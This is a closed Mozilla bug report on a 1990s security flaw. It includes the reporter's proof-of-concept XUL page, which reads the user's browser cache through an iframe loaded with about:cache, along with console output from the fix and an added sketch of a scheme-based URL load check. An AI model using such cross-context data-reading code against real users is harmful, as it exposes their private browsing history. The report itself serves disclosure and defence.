Closed Bug 9810 Opened 26 years ago Closed 26 years ago

Reading user's cache using XUL and iframe

Categories

(Core :: Security, defect, P3)

x86
Windows 95
defect

Tracking

()

VERIFIED FIXED

People

(Reporter: joro, Assigned: norrisboyd)

There is a security vulnerability in Mozilla 5.0 M7 Win95 (guess all platforms), which allows reading user's cache using XUL and iframe.
The code is:
----------------------------------cache2.xul--------------------------
<?xml version="1.0"?>
<!-- <?xml-stylesheet href="xul.css" type="text/css"?> -->
<!DOCTYPE window>
<xul:window xmlns:html="http://www.w3.org/TR/REC-html40"
            xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
            title = "Reading user's cache">
  <html:script>
  <![CDATA[
    function dumpCache() {
      dump("Here are some URLs from your cache:\n");
      for(i=0;i<10;i++)
        dump(window.frames[0].document.links[i].href+"\n");
    }
  ]]>
  </html:script>
  <xul:toolbox>
    <xul:toolbar>
      <xul:titledbutton value="Press me to dump cache" onclick="dumpCache()"
                        style="background-color:rgb(192,192,192);"/>
    </xul:toolbar>
  </xul:toolbox>
  <html:hr/>
  <html:iframe type="content-primary" src="about:cache" />
  <html:h3>
    Press the button and look at the apprunner console to see some URLs in your cache.
  </html:h3>
</xul:window>
----------------------------------------------------------------------
Status: NEW → ASSIGNED
Target Milestone: M11
Blocks: 12633
Group: netscapeconfidential?
Component: Browser-General → Security
QA Contact: leger → dshea
Updating component
Depends on: 11462
Depends on: 7254
No longer depends on: 11462
Fixed. Now we get an error from the URL checks:

->>>>>>>>>>>>>> Write Clipboard to memory
->>>>>>>>>>>>>> Read Clipboard from memory
Opening file signon.tbl failed
FindShortcut: in='http://prime/gunxul/cache1.xul ' out='null'
JavaScript Error: illegal URL method 'about:cache'
URL: http://prime/gunxul/cache1.xul
LineNo: 4
JavaScript Error: uncaught exception: [Exception... "Failure" code: "-2147467259" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "http://prime/gunxul/cache1.xul Line: 4"]
Document http://prime/gunxul/cache1.xul loaded successfully
Document: Done (0.657 secs)
Status: ASSIGNED → RESOLVED
Closed: 26 years ago
Resolution: --- → FIXED
Status: RESOLVED → VERIFIED
Windows NT 1999120208 Comm Verified
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Opening fixed security bugs to the public.
Group: netscapeconfidential?
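
The fix comment above reports that the load is now rejected by a URL check ("illegal URL method 'about:cache'"). As an added example (not Mozilla's code and not part of the bug's comments), the following sketches a scheme-based load check of that kind. The scheme lists, the function names and the view-source unwrapping are assumptions made for illustration.

```javascript
// Added illustration, not Mozilla source code. The scheme lists below are
// assumptions made for this example.
const PRIVILEGED_SCHEMES = new Set(["about", "chrome", "resource", "file"]);
const ABOUT_PAGES_OPEN_TO_WEB = new Set(["blank"]);

// Lowercased scheme of a URL string, or null for a relative reference.
// A regex is used so opaque URLs like "about:cache" need no special casing.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(String(url).trim());
  return m ? m[1].toLowerCase() : null;
}

// True if a document at sourceURL may load targetURL into a frame or link.
function canLoad(sourceURL, targetURL) {
  // Browser chrome is trusted and may load anything.
  if (schemeOf(sourceURL) === "chrome") return true;

  let target = String(targetURL).trim();
  // Judge "view-source:about:cache" by the URL it wraps.
  while (schemeOf(target) === "view-source") {
    target = target.slice("view-source:".length);
  }
  const scheme = schemeOf(target);
  if (scheme === null) return true; // relative: stays on the source's scheme
  if (!PRIVILEGED_SCHEMES.has(scheme)) return true;
  if (scheme === "about") {
    // Compare only the page name, ignoring case, query and fragment.
    const page = target.slice("about:".length).split(/[?#]/)[0].toLowerCase();
    return ABOUT_PAGES_OPEN_TO_WEB.has(page);
  }
  return false;
}

// Throwing form, mirroring the error text in the console output above.
function checkLoadURI(sourceURL, targetURL) {
  if (!canLoad(sourceURL, targetURL)) {
    throw new Error(`illegal URL method '${targetURL}'`);
  }
}

// Constructed sample loads, evaluated for the page named in the fix comment.
const source = "http://prime/gunxul/cache1.xul";
for (const t of ["about:cache", "ABOUT:cache", "view-source:about:cache",
                 "about:blank", "http://prime/index.html", "frame.html"]) {
  console.log(t, "->", canLoad(source, t) ? "allowed" : "blocked");
}
```

The check has to run on the normalized target (trimmed, case-folded, wrappers removed); comparing the raw string against "about:cache" would miss the second and third sample loads.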